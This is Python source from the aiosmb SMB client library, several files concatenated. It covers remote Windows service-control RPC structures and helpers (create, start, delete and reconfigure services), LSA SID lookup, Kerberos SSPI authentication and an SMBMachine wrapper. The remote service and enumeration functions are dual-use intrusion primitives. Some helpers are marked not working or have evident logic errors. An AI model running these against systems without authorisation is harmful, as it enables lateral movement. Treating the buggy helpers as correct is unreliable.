class REnumServicesStatusWResponse(NDRCALL):
	structure = (
		('lpBuffer',NDRUniConformantArray),
		('pcbBytesNeeded',BOUNDED_DWORD_256K),
		('lpServicesReturned',BOUNDED_DWORD_256K),
		('lpResumeIndex',LPBOUNDED_DWORD_256K),
		('ErrorCode', DWORD),
	)

class ROpenSCManagerW(NDRCALL):
	opnum = 15
	structure = (
		('lpMachineName',SVCCTL_HANDLEW),
		('lpDatabaseName',LPWSTR),
		('dwDesiredAccess',DWORD),
	)

class ROpenSCManagerWResponse(NDRCALL):
	structure = (
		('lpScHandle',SC_RPC_HANDLE),
		('ErrorCode', DWORD),
	)

class ROpenServiceW(NDRCALL):
	opnum = 16
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('lpServiceName',WSTR),
		('dwDesiredAccess',DWORD),
	)

class ROpenServiceWResponse(NDRCALL):
	structure = (
		('lpServiceHandle',SC_RPC_HANDLE),
		('ErrorCode', DWORD),
	)

class RQueryServiceConfigW(NDRCALL):
	opnum = 17
	structure = (
		('hService',SC_RPC_HANDLE),
		('cbBufSize',DWORD),
	)

class RQueryServiceConfigWResponse(NDRCALL):
	structure = (
		('lpServiceConfig',QUERY_SERVICE_CONFIGW),
		('pcbBytesNeeded',BOUNDED_DWORD_8K),
		('ErrorCode', DWORD),
	)

class RQueryServiceLockStatusW(NDRCALL):
	opnum = 18
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('cbBufSize',DWORD),
	)

class RQueryServiceLockStatusWResponse(NDRCALL):
	structure = (
		('lpLockStatus',QUERY_SERVICE_LOCK_STATUSW),
		('pcbBytesNeeded',BOUNDED_DWORD_4K),
		('ErrorCode', DWORD),
	)

class RStartServiceW(NDRCALL):
	opnum = 19
	structure = (
		('hService',SC_RPC_HANDLE),
		('argc',DWORD),
		('argv',UNIQUE_STRING_PTRSW),
	)

class RStartServiceWResponse(NDRCALL):
	structure = (
		('ErrorCode', DWORD),
	)

class RGetServiceDisplayNameW(NDRCALL):
	opnum = 20
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('lpServiceName',WSTR),
		('lpcchBuffer',DWORD),
	)

class RGetServiceDisplayNameWResponse(NDRCALL):
	structure = (
		('lpDisplayName',WSTR),
		('lpcchBuffer',DWORD),
		('ErrorCode', DWORD),
	)

class RGetServiceKeyNameW(NDRCALL):
	opnum = 21
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('lpDisplayName',WSTR),
		('lpcchBuffer',DWORD),
	)

class RGetServiceKeyNameWResponse(NDRCALL):
	structure = (
		('lpDisplayName',WSTR),
		('lpcchBuffer',DWORD),
		('ErrorCode', DWORD),
	)

class REnumServiceGroupW(NDRCALL):
	opnum = 35
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('dwServiceType',DWORD),
		('dwServiceState',DWORD),
		('cbBufSize',DWORD),
		('lpResumeIndex',LPBOUNDED_DWORD_256K),
		('pszGroupName',LPWSTR),
	)

class REnumServiceGroupWResponse(NDRCALL):
	structure = (
		('lpBuffer',LPBYTE),
		('pcbBytesNeeded',BOUNDED_DWORD_256K),
		('lpServicesReturned',BOUNDED_DWORD_256K),
		('lpResumeIndex',BOUNDED_DWORD_256K),
		('ErrorCode', DWORD),
	)

class RChangeServiceConfig2W(NDRCALL):
	opnum = 37
	structure = (
	   ('hService',SC_RPC_HANDLE),
	   ('Info',SC_RPC_CONFIG_INFOW),
	)

class RChangeServiceConfig2WResponse(NDRCALL):
	structure = (
		('ErrorCode', DWORD),
	)

class RQueryServiceConfig2W(NDRCALL):
	opnum = 39
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwInfoLevel',DWORD),
		('cbBufSize',DWORD),
	)

class RQueryServiceConfig2WResponse(NDRCALL):
	structure = (
		('lpBuffer',NDRUniConformantArray),
		('pcbBytesNeeded',BOUNDED_DWORD_8K),
		('ErrorCode', DWORD),
	)

class RQueryServiceStatusEx(NDRCALL):
	opnum = 40
	structure = (
		('hService',SC_RPC_HANDLE),
		('InfoLevel',DWORD),
		('cbBufSize',DWORD),
	)

class RQueryServiceStatusExResponse(NDRCALL):
	structure = (
		('lpBuffer',NDRUniConformantArray),
		('pcbBytesNeeded',BOUNDED_DWORD_8K),
		('ErrorCode', DWORD),
	)

class REnumServicesStatusExW(NDRCALL):
	opnum = 42
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('InfoLevel',DWORD),
		('dwServiceType',DWORD),
		('dwServiceState',DWORD),
		('cbBufSize',DWORD),
		('lpResumeIndex',LPBOUNDED_DWORD_256K),
		('pszGroupName',LPWSTR),
	)

class REnumServicesStatusExWResponse(NDRCALL):
	structure = (
		('lpBuffer',NDRUniConformantArray),
		('pcbBytesNeeded',BOUNDED_DWORD_256K),
		('lpServicesReturned',BOUNDED_DWORD_256K),
		('lpResumeIndex',BOUNDED_DWORD_256K),
		('ErrorCode', DWORD),
	)

class RCreateServiceWOW64W(NDRCALL):
	opnum = 45
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('lpServiceName',WSTR),
		('lpDisplayName',LPWSTR),
		('dwDesiredAccess',DWORD),
		('dwServiceType',DWORD),
		('dwStartType',DWORD),
		('dwErrorControl',DWORD),
		('lpBinaryPathName',WSTR),
		('lpLoadOrderGroup',LPWSTR),
		('lpdwTagId',LPDWORD),
		('lpDependencies',LPBYTE),
		('dwDependSize',DWORD),
		('lpServiceStartName',LPWSTR),
		('lpPassword',LPBYTE),
		('dwPwSize',DWORD),
	)

class RCreateServiceWOW64WResponse(NDRCALL):
	structure = (
		('lpdwTagId',LPWSTR),
		('lpServiceHandle',SC_RPC_HANDLE),
		('ErrorCode', DWORD),
	)

# Still not working, for some reason something changes in the way the pointer inside SC_RPC_NOTIFY_PARAMS is marshalled here
class RNotifyServiceStatusChange(NDRCALL):
	opnum = 47
	structure = (
		('hService',SC_RPC_HANDLE),
		('NotifyParams',SC_RPC_NOTIFY_PARAMS),
		('pClientProcessGuid',GUID),
	)

class RNotifyServiceStatusChangeResponse(NDRCALL):
	structure = (
		('pSCMProcessGuid',GUID),
		('pfCreateRemoteQueue',PBOOL),
		('phNotify',SC_NOTIFY_RPC_HANDLE),
		('ErrorCode', DWORD),
	)

# Not working, until I don't fix the previous one
class RGetNotifyResults(NDRCALL):
	opnum = 48
	structure = (
		('hNotify',SC_NOTIFY_RPC_HANDLE),
	)

class RGetNotifyResultsResponse(NDRCALL):
	structure = (
		('ppNotifyParams',PSC_RPC_NOTIFY_PARAMS_LIST),
		('ErrorCode', DWORD),
	)

# Not working, until I don't fix the previous ones
class RCloseNotifyHandle(NDRCALL):
	opnum = 49
	structure = (
		('phNotify',SC_NOTIFY_RPC_HANDLE),
	)

class RCloseNotifyHandleResponse(NDRCALL):
	structure = (
		('phNotify',SC_NOTIFY_RPC_HANDLE),
		('pfApcFired',PBOOL),
		('ErrorCode', DWORD),
	)

# Not working, returning bad_stub_data
class RControlServiceExW(NDRCALL):
	opnum = 51
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwControl',DWORD),
		('dwInfoLevel',DWORD),
		('pControlInParams',SERVICE_CONTROL_STATUS_REASON_IN_PARAMSW),
	)

class RControlServiceExWResponse(NDRCALL):
	structure = (
		('pControlOutParams',SERVICE_CONTROL_STATUS_REASON_OUT_PARAMS),
		('ErrorCode', DWORD),
	)

class RQueryServiceConfigEx(NDRCALL):
	opnum = 56
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwInfoLevel',DWORD),
	)

class RQueryServiceConfigExResponse(NDRCALL):
	structure = (
		('pInfo',SC_RPC_CONFIG_INFOW),
		('ErrorCode', DWORD),
	)

################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
 0 : (RCloseServiceHandle, RCloseServiceHandleResponse),
 1 : (RControlService, RControlServiceResponse),
 2 : (RDeleteService, RDeleteServiceResponse),
 3 : (RLockServiceDatabase, RLockServiceDatabaseResponse),
 4 : (RQueryServiceObjectSecurity, RQueryServiceObjectSecurityResponse),
 5 : (RSetServiceObjectSecurity, RSetServiceObjectSecurityResponse),
 6 : (RQueryServiceStatus, RQueryServiceStatusResponse),
 7 : (RSetServiceStatus, RSetServiceStatusResponse),
 8 : (RUnlockServiceDatabase, RUnlockServiceDatabaseResponse),
 9 : (RNotifyBootConfigStatus, RNotifyBootConfigStatusResponse),
11 : (RChangeServiceConfigW, RChangeServiceConfigWResponse),
12 : (RCreateServiceW, RCreateServiceWResponse),
13 : (REnumDependentServicesW, REnumDependentServicesWResponse),
14 : (REnumServicesStatusW, REnumServicesStatusWResponse),
15 : (ROpenSCManagerW, ROpenSCManagerWResponse),
16 : (ROpenServiceW, ROpenServiceWResponse),
17 : (RQueryServiceConfigW, RQueryServiceConfigWResponse),
18 : (RQueryServiceLockStatusW, RQueryServiceLockStatusWResponse),
19 : (RStartServiceW, RStartServiceWResponse),
20 : (RGetServiceDisplayNameW, RGetServiceDisplayNameWResponse),
21 : (RGetServiceKeyNameW, RGetServiceKeyNameWResponse),
35 : (REnumServiceGroupW, REnumServiceGroupWResponse),
37 : (RChangeServiceConfig2W, RChangeServiceConfig2WResponse),
39 : (RQueryServiceConfig2W, RQueryServiceConfig2WResponse),
40 : (RQueryServiceStatusEx, RQueryServiceStatusExResponse),
42 : (REnumServicesStatusExW, REnumServicesStatusExWResponse),
45 : (RCreateServiceWOW64W, RCreateServiceWOW64WResponse),
47 : (RNotifyServiceStatusChange, RNotifyServiceStatusChangeResponse),
48 : (RGetNotifyResults, RGetNotifyResultsResponse),
49 : (RCloseNotifyHandle, RCloseNotifyHandleResponse),
51 : (RControlServiceExW, RControlServiceExWResponse),
56 : (RQueryServiceConfigEx, RQueryServiceConfigExResponse),
}

################################################################################
# HELPER FUNCTIONS
################################################################################
def checkNullString(string):
	if string == NULL:
		return string

	if string[-1:] != '\x00':
		return string + '\x00'
	else:
		return string

async def hRCloseServiceHandle(dce, hSCObject):
	request = RCloseServiceHandle()
	request['hSCObject'] = hSCObject
	return await dce.request(request)

async def hRControlService(dce, hService, dwControl):
	request = RControlService()
	request['hService'] = hService
	request['dwControl'] = dwControl
	return await dce.request(request)

async def hRDeleteService(dce, hService):
	request = RDeleteService()
	request ['hService'] = hService
	return await dce.request(request)

async def hRLockServiceDatabase(dce, hSCManager):
	request = RLockServiceDatabase()
	request['hSCManager'] = hSCManager
	return await dce.request(request)

async def hRQueryServiceObjectSecurity(dce, hService, dwSecurityInformation, cbBufSize ):
	request = RQueryServiceObjectSecurity()
	request['hService'] = hService
	request['dwSecurityInformation'] = dwSecurityInformation
	request['cbBufSize'] = cbBufSize
	return await dce.request(request)

async def hRSetServiceObjectSecurity(dce, hService, dwSecurityInformation, lpSecurityDescriptor, cbBufSize ):
	request = RSetServiceObjectSecurity()
	request['hService'] = hService
	request['dwSecurityInformation'] = dwSecurityInformation
	request['cbBufSize'] = cbBufSize
	return await dce.request(request)

async def hRQueryServiceStatus(dce, hService ):
	request = RQueryServiceStatus()
	request['hService'] = hService
	return await dce.request(request)

async def hRSetServiceStatus(dce, hServiceStatus, lpServiceStatus ):
	request = RSetServiceStatus()
	request['hServiceStatus'] = hServiceStatus
	request['lpServiceStatus'] = lpServiceStatus
	return await dce.request(request)

async def hRUnlockServiceDatabase(dce, Lock ):
	request = RUnlockServiceDatabase()
	request['Lock'] = Lock
	return await dce.request(request)

async def hRNotifyBootConfigStatus(dce, lpMachineName, BootAcceptable ):
	request = RNotifyBootConfigStatus()
	request['lpMachineName'] = lpMachineName
	request['BootAcceptable'] = BootAcceptable
	return await dce.request(request)

async def hRChangeServiceConfigW(dce, hService, dwServiceType=SERVICE_NO_CHANGE, dwStartType=SERVICE_NO_CHANGE, dwErrorControl=SERVICE_NO_CHANGE, lpBinaryPathName=NULL, lpLoadOrderGroup=NULL, lpdwTagId=NULL, lpDependencies=NULL, dwDependSize=0, lpServiceStartName=NULL, lpPassword=NULL, dwPwSize=0, lpDisplayName=NULL):
	changeServiceConfig = RChangeServiceConfigW()
	changeServiceConfig['hService'] = hService
	changeServiceConfig['dwServiceType'] = dwServiceType
	changeServiceConfig['dwStartType'] = dwStartType
	changeServiceConfig['dwErrorControl'] = dwErrorControl
	changeServiceConfig['lpBinaryPathName'] = checkNullString(lpBinaryPathName)
	changeServiceConfig['lpLoadOrderGroup'] = checkNullString(lpLoadOrderGroup)
	changeServiceConfig['lpdwTagId'] = lpdwTagId
	changeServiceConfig['lpDependencies'] = lpDependencies
	# Strings MUST be NULL terminated for lpDependencies
	changeServiceConfig['dwDependSize'] = dwDependSize
	changeServiceConfig['lpServiceStartName'] = checkNullString(lpServiceStartName)
	changeServiceConfig['lpPassword'] = lpPassword
	changeServiceConfig['dwPwSize'] = dwPwSize
	changeServiceConfig['lpDisplayName'] = checkNullString(lpDisplayName)
	return await dce.request(changeServiceConfig)

async def hRCreateServiceW(dce, hSCManager, lpServiceName, lpDisplayName, dwDesiredAccess=SERVICE_ALL_ACCESS, dwServiceType=SERVICE_WIN32_OWN_PROCESS, dwStartType=SERVICE_AUTO_START, dwErrorControl=SERVICE_ERROR_IGNORE, lpBinaryPathName=NULL, lpLoadOrderGroup=NULL, lpdwTagId=NULL, lpDependencies=NULL, dwDependSize=0, lpServiceStartName=NULL, lpPassword=NULL, dwPwSize=0):
	createService = RCreateServiceW()
	createService['hSCManager'] = hSCManager
	createService['lpServiceName'] = checkNullString(lpServiceName)
	createService['lpDisplayName'] = checkNullString(lpDisplayName)
	createService['dwDesiredAccess'] = dwDesiredAccess
	createService['dwServiceType'] = dwServiceType
	createService['dwStartType'] = dwStartType
	createService['dwErrorControl'] = dwErrorControl
	createService['lpBinaryPathName'] = checkNullString(lpBinaryPathName)
	createService['lpLoadOrderGroup'] = checkNullString(lpLoadOrderGroup)
	createService['lpdwTagId'] = lpdwTagId
	# Strings MUST be NULL terminated for lpDependencies
	createService['lpDependencies'] = lpDependencies
	createService['dwDependSize'] = dwDependSize
	createService['lpServiceStartName'] = checkNullString(lpServiceStartName)
	createService['lpPassword'] = lpPassword
	createService['dwPwSize'] = dwPwSize
	return await dce.request(createService)

async def hREnumDependentServicesW(dce, hService, dwServiceState, cbBufSize ):
	enumDependentServices = REnumDependentServicesW()
	enumDependentServices['hService'] = hService
	enumDependentServices['dwServiceState'] = dwServiceState
	enumDependentServices['cbBufSize'] = cbBufSize
	return await dce.request(enumDependentServices)

@red
async def hREnumServicesStatusW(dce, hSCManager, dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS, dwServiceState=SERVICE_STATE_ALL):
	class ENUM_SERVICE_STATUSW2(NDRSTRUCT):
		# This is a little trick, since the original structure is slightly different
		# but instead of parsing the LPBYTE buffer at hand, we just do it with the aid
		# of the NDR library, although the pointers are swapped from the original specification.
		# Why is this? Well.. since we're getting an LPBYTE back, it's just a copy of the remote's memory
		# where the pointers are actually POINTING to the data.
		# Sadly, the pointers are not aligned based on the services records, so we gotta do this
		# It should be easier in C of course.
		class STR(NDRPOINTER):
			referent = (
				('Data', WIDESTR),
			)
		structure = (
			('lpServiceName',STR),
			('lpDisplayName',STR),
			('ServiceStatus',SERVICE_STATUS),
		)

	enumServicesStatus = REnumServicesStatusW()
	enumServicesStatus['hSCManager'] = hSCManager
	enumServicesStatus['dwServiceType'] = dwServiceType
	enumServicesStatus['dwServiceState'] = dwServiceState
	enumServicesStatus['cbBufSize'] = 0
	enumServicesStatus['lpResumeIndex'] = NULL

	
	resp, e = await dce.request(enumServicesStatus)
	if e is not None:
		#print('e! %s' % e)
		if isinstance(e, SMBException):
			#this case the exception is coming from the SMB connection itself, it's is dead Jim
			return None, e
		if e.get_error_code() == system_errors.ERROR_MORE_DATA:
			resp = e.get_packet()
			enumServicesStatus['cbBufSize'] = resp['pcbBytesNeeded']
			resp, e = await dce.request(enumServicesStatus)
	else:
		return None, e
	
	# Now we're supposed to have all services returned. Now we gotta parse them

	enumArray = NDRUniConformantArray()
	enumArray.item = ENUM_SERVICE_STATUSW2

	enumArray.setArraySize(resp['lpServicesReturned'])

	data = b''.join(resp['lpBuffer'])
	enumArray.fromString(data)
	data = data[4:]
	# Since the pointers here are pointing to the actual data, we have to reparse
	# the referents
	for record in enumArray['Data']:
		offset =  record.fields['lpDisplayName'].fields['ReferentID']-4
		name = WIDESTR(data[offset:])
		record['lpDisplayName'] = name['Data']
		offset =  record.fields['lpServiceName'].fields['ReferentID']-4
		name = WIDESTR(data[offset:])
		record['lpServiceName'] = name['Data']

	return enumArray['Data'], None

async def hROpenSCManagerW(dce, lpMachineName='DUMMY\x00', lpDatabaseName='ServicesActive\x00', dwDesiredAccess=SERVICE_START | SERVICE_STOP | SERVICE_CHANGE_CONFIG | SERVICE_QUERY_CONFIG | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS | SC_MANAGER_ENUMERATE_SERVICE):
	openSCManager = ROpenSCManagerW()
	openSCManager['lpMachineName'] = checkNullString(lpMachineName)
	openSCManager['lpDatabaseName'] = checkNullString(lpDatabaseName)
	openSCManager['dwDesiredAccess'] = dwDesiredAccess
	return await dce.request(openSCManager)

async def hROpenServiceW(dce, hSCManager, lpServiceName, dwDesiredAccess= SERVICE_ALL_ACCESS):
	openService = ROpenServiceW()
	openService['hSCManager'] = hSCManager
	openService['lpServiceName'] = checkNullString(lpServiceName)
	openService['dwDesiredAccess'] = dwDesiredAccess
	return await dce.request(openService)

@red
async def hRQueryServiceConfigW(dce, hService):
	queryService = RQueryServiceConfigW()
	queryService['hService'] = hService
	queryService['cbBufSize'] = 0
	
	resp, e = await dce.request(queryService)
	if e is not None:
		if e.get_error_code() == system_errors.ERROR_INSUFFICIENT_BUFFER:
			resp = e.get_packet()
			queryService['cbBufSize'] = resp['pcbBytesNeeded']
			resp = await dce.request(queryService)
		else:
			return None, e

	return resp, None

async def hRQueryServiceLockStatusW(dce, hSCManager, cbBufSize ):
	queryServiceLock = RQueryServiceLockStatusW()
	queryServiceLock['hSCManager'] = hSCManager
	queryServiceLock['cbBufSize'] = cbBufSize
	return await dce.request(queryServiceLock)

async def hRStartServiceW(dce, hService, argc=0, argv=NULL ):
	startService = RStartServiceW()
	startService['hService'] = hService
	startService['argc'] = argc
	if argc == 0:
		startService['argv'] = NULL
	else:
		for item in argv:
			itemn = LPWSTR()
			itemn['Data'] = checkNullString(item)
			startService['argv'].append(itemn)
	return await dce.request(startService)

async def hRGetServiceDisplayNameW(dce, hSCManager, lpServiceName, lpcchBuffer ):
	getServiceDisplay = RGetServiceDisplayNameW()
	getServiceDisplay['hSCManager'] = hSCManager
	getServiceDisplay['lpServiceName'] = checkNullString(lpServiceName)
	getServiceDisplay['lpcchBuffer'] = lpcchBuffer
	return await dce.request(getServiceDisplay)

async def hRGetServiceKeyNameW(dce, hSCManager, lpDisplayName, lpcchBuffer ):
	getServiceKeyName = RGetServiceKeyNameW()
	getServiceKeyName['hSCManager'] = hSCManager
	getServiceKeyName['lpDisplayName'] = checkNullString(lpDisplayName)
	getServiceKeyName['lpcchBuffer'] = lpcchBuffer
	return await dce.request(getServiceKeyName)

async def hREnumServiceGroupW(dce, hSCManager, dwServiceType, dwServiceState, cbBufSize, lpResumeIndex = NULL, pszGroupName = NULL ):
	enumServiceGroup = REnumServiceGroupW()
	enumServiceGroup['hSCManager'] = hSCManager
	enumServiceGroup['dwServiceType'] = dwServiceType
	enumServiceGroup['dwServiceState'] = dwServiceState
	enumServiceGroup['cbBufSize'] = cbBufSize
	enumServiceGroup['lpResumeIndex'] = lpResumeIndex
	enumServiceGroup['pszGroupName'] = pszGroupName
	return await dce.request(enumServiceGroup)



from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.dcerpc.v5 import lsad
from aiosmb.dcerpc.v5 import lsat
from aiosmb.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb import logger
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.commons.utils.decorators import red, rr, red_gen
		
class LSAD:
	def __init__(self, connection):
		self.connection = connection
		self.service_manager = None
		
		self.dce = None
		self.handle = None
		
		self.policy_handles = {} #handle to sid
		self.ph_ctr = 0
		
	async def __aenter__(self):
		return self
	
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None

	@red
	async def connect(self, open = True):
		rpctransport = SMBDCEFactory(self.connection, filename=r'\lsarpc')
		self.dce = rpctransport.get_dce_rpc()
		await rr(self.dce.connect())
		await rr(self.dce.bind(lsad.MSRPC_UUID_LSAD))
		return True,None
	
	@red
	async def close(self):		
		if self.dce:
			for hid in self.policy_handles:
				try:
					await lsad.hLsarClose(self.dce, self.policy_handles[hid])
				except:
					logger.exception()
					pass

			try:
				await self.dce.disconnect()
			except:
				pass
			return
	
	@red
	async def open_policy2(self, permissions = MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES):
		resp, _ = await rr(lsad.hLsarOpenPolicy2(self.dce, permissions))
		ph = resp['PolicyHandle']
		self.policy_handles[self.ph_ctr] = ph
		t = self.ph_ctr
		self.ph_ctr += 1
		return t, None

	@red
	async def get_domain_sid(self, policy_handle):
		resp, _ = await rr(lsad.hLsarQueryInformationPolicy2(self.dce, self.policy_handles[policy_handle], lsad.POLICY_INFORMATION_CLASS.PolicyPrimaryDomainInformation))
		domain_sid = resp['PolicyInformation']['PolicyPrimaryDomainInfo']['Sid'].formatCanonical()
		return domain_sid, None

	@red
	async def get_host_sid(self, policy_handle):
		resp, _ = await rr(lsad.hLsarQueryInformationPolicy2(self.dce, self.policy_handles[policy_handle], lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation))
		host_sid = resp['PolicyInformation']['PolicyAccountDomainInfo']['DomainSid'].formatCanonical()
		return host_sid, None

	@red_gen
	async def lookup_sids(self, policy_handle, sids, lookup_level = lsat.LSAP_LOOKUP_LEVEL.enumItems.LsapLookupWksta):
		"""
		sids: list of string sid
		"""
		resp, _ = await rr(lsat.hLsarLookupSids(self.dce, self.policy_handles[policy_handle], sids, lookup_level))
		if lookup_level == lsat.LSAP_LOOKUP_LEVEL.enumItems.LsapLookupWksta:
			domains = []
			for entry in resp['ReferencedDomains']['Domains']:
				domains.append(entry['Name'])

			for entry in resp['TranslatedNames']['Names']:
				domain = domains[entry['DomainIndex']]
				yield domain, entry['Name'], None
		else:
			yield resp, None
		

	



#
# This is just a simple interface to the winsspi library to support Kerberos
# Will only work on windows, ovbiously
# 
#
#

from aiosmb.authentication.spnego.asn1_structs import KRB5Token
from winsspi.sspi import KerberosSMBSSPI
from winsspi.common.function_defs import ISC_REQ
from minikerberos.gssapi.gssapi import get_gssapi
from minikerberos.protocol.asn1_structs import AP_REQ, AP_REP
from minikerberos.protocol.encryption import Enctype, Key, _enctype_table

class SMBKerberosSSPI:
	def __init__(self, settings):
		self.iterations = 0
		self.settings = settings
		self.mode = 'CLIENT'
		self.ksspi = KerberosSMBSSPI()
		self.client = None
		self.target = None
		self.gssapi = None
		self.etype = None
		
		self.setup()
		
	def setup(self):
		self.mode = self.settings.mode
		self.client = self.settings.client
		self.target = self.settings.target
		
	async def encrypt(self, data, message_no):
		return self.gssapi.GSS_Wrap(data, message_no)
		
	async def decrypt(self, data, message_no, direction='init', auth_data=None):
		return self.gssapi.GSS_Unwrap(data, message_no, direction=direction, auth_data=auth_data)
	
	def get_session_key(self):
		return self.ksspi.get_session_key()
	
	async def authenticate(self, authData = None, flags = None, seq_number = 0, is_rpc = False):
		#authdata is only for api compatibility reasons
		if is_rpc == True:
			if self.iterations == 0:
				flags = ISC_REQ.CONFIDENTIALITY | \
						ISC_REQ.INTEGRITY | \
						ISC_REQ.MUTUAL_AUTH | \
						ISC_REQ.REPLAY_DETECT | \
						ISC_REQ.SEQUENCE_DETECT|\
						ISC_REQ.USE_DCE_STYLE
						

				token = self.ksspi.get_ticket_for_spn(self.target, flags = flags, is_rpc = True, token_data = authData)
				#print(token.hex())
				self.iterations += 1
				return token, True
			
			elif self.iterations == 1:
				flags = ISC_REQ.USE_DCE_STYLE
						
				token = self.ksspi.get_ticket_for_spn(self.target, flags = flags, is_rpc = True, token_data = authData)
				#print(token.hex())
				
				
				aprep = AP_REP.load(token).native
				
				subkey = Key(aprep['enc-part']['etype'], self.get_session_key())
				
				cipher_text = aprep['enc-part']['cipher']
				cipher = _enctype_table[aprep['enc-part']['etype']]()
				
				plaintext = cipher.decrypt(subkey, 12, cipher_text)
				
				self.gssapi = get_gssapi(subkey)
				
				self.iterations += 1
				return token, False
				
			else:
				raise Exception('SSPI Kerberos -RPC - auth encountered too many calls for authenticate.')
			
		else:
			apreq = self.ksspi.get_ticket_for_spn(self.target)
			return apreq, False
		



import asyncio
import ntpath
import os

from aiosmb import logger
from aiosmb.commons.interfaces.share import SMBShare
from aiosmb.commons.interfaces.session import SMBUserSession
from aiosmb.commons.interfaces.file import SMBFile
from aiosmb.dcerpc.v5.interfaces.srvsmgr import SMBSRVS
from aiosmb.dcerpc.v5.interfaces.samrmgr import SMBSAMR
from aiosmb.dcerpc.v5.interfaces.lsatmgr import LSAD
from aiosmb.dcerpc.v5.interfaces.drsuapimgr import SMBDRSUAPI
from aiosmb.dcerpc.v5.interfaces.servicemanager import SMBRemoteServieManager
from aiosmb.dcerpc.v5.interfaces.remoteregistry import RRP
from aiosmb.dcerpc.v5.interfaces.rprnmgr import SMBRPRN

from aiosmb.commons.utils.decorators import red, rr, red_gen, rr_gen
from aiosmb.commons.exceptions import SMBMachineException

from aiosmb.commons.interfaces.blocking.file.file import SMBBlockingFileMgr
from aiosmb.commons.interfaces.blocking.file.blockingfile import SMBBlockingFile
from aiosmb.commons.utils.apq import AsyncProcessQueue

from aiosmb.dcerpc.v5.rprn import PRINTER_CHANGE_ADD_JOB

def req_srvs_gen(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			if 'SRVS' in this.privtable:
				if this.privtable['SRVS'] == False:
					raise SMBMachineException('SRVS failed to open. Probably permission issues.')
			if this.srvs is None:
				await rr(this.connect_rpc('SRVS'))
			async for x in  funct(*args, **kwargs):
				if x[-1] is not None:
					raise x[-1]
				yield x
		except Exception as e:
			raise e
	return wrapper

def req_rrp(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			if 'RRP' in this.privtable:
				if this.privtable['RRP'] == False:
					raise SMBMachineException('RRP failed to open. Probably permission issues.')
			if this.rrp is None:
				await rr(this.connect_rpc('RRP'))
			x = await funct(*args, **kwargs)
			return x
		except Exception as e:
			raise e
	return wrapper

def req_samr_gen(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			if 'SAMR' in this.privtable:
				if this.privtable['SAMR'] == False:
					raise SMBMachineException('SAMR failed to open. Probably permission issues.')
			if this.samr is None:
				await rr(this.connect_rpc('SAMR'))
			async for x in funct(*args, **kwargs):
				if x[-1] is not None:
					raise x[-1]
				yield x
		except Exception as e:
			raise e
	return wrapper

def req_lsad_gen(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			if 'LSAD' in this.privtable:
				if this.privtable['LSAD'] == False:
					raise SMBMachineException('LSAD failed to open. Probably permission issues.')
			if this.lsad is None:
				await rr(this.connect_rpc('LSAD'))
			async for x in  funct(*args, **kwargs):
				if x[-1] is not None:
					raise x[-1]
				yield x
		except Exception as e:
			raise e
	return wrapper

def req_servicemanager_gen(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			if 'SERVICEMGR' in this.privtable:
				if this.privtable['SERVICEMGR'] == False:
					raise SMBMachineException('SERVICEMGR failed to open. Probably permission issues.')
			if this.servicemanager is None:
				await rr(this.connect_servicemanager())
			async for x in funct(*args, **kwargs):
				if x[-1] is not None:
					raise x[-1]
				yield x
		except Exception as e:
			raise e
	return wrapper

def req_servicemanager(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			if 'SERVICEMGR' in this.privtable:
				if this.privtable['SERVICEMGR'] == False:
					raise SMBMachineException('SERVICEMGR failed to open. Probably permission issues.')
			if this.servicemanager is None:
				await rr(this.connect_servicemanager())
			x = await funct(*args, **kwargs)
			return x
		except Exception as e:
			raise e
	return wrapper

def req_rprn(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			if 'RPRN' in this.privtable:
				if this.privtable['RPRN'] == False:
					raise SMBMachineException('RPRN failed to open. Probably permission issues.')
			if this.rprn is None:
				await rr(this.connect_rpc('RPRN'))
			x = await funct(*args, **kwargs)
			return x
		except Exception as e:
			raise e
	return wrapper

class SMBMachine:
	def __init__(self, connection):
		self.connection = connection
		self.services = []
		self.shares = []
		self.localgroups = []
		self.sessions = []
		self.domains = []

		self.srvs = None
		self.samr = None
		self.lsad = None
		self.rrp = None
		self.rprn = None

		self.filesystem = None
		self.servicemanager = None

		self.privtable = {}
		self.blocking_mgr_tasks = {}

	def get_blocking_file(self):
		"""
		Starts a file manager task and initializes the io queues
		"""

		in_q = AsyncProcessQueue()
		out_q = AsyncProcessQueue()
		fsm = SMBBlockingFileMgr(self.connection, in_q, out_q)
		fsmt = asyncio.create_task(fsm.run())
		self.blocking_mgr_tasks[fsmt] = 1
		bfile = SMBBlockingFile(in_q, out_q)
		return bfile

	@red
	async def connect_rpc(self, service_name):
		if service_name.upper() == 'SRVS':
			self.srvs = SMBSRVS(self.connection)
			self.privtable['SRVS'] = False
			await rr(self.srvs.connect())
			self.privtable['SRVS'] = True
		elif service_name.upper() == 'SAMR':
			self.samr = SMBSAMR(self.connection)
			self.privtable['SAMR'] = False
			await rr(self.samr.connect())
			self.privtable['SAMR'] = True
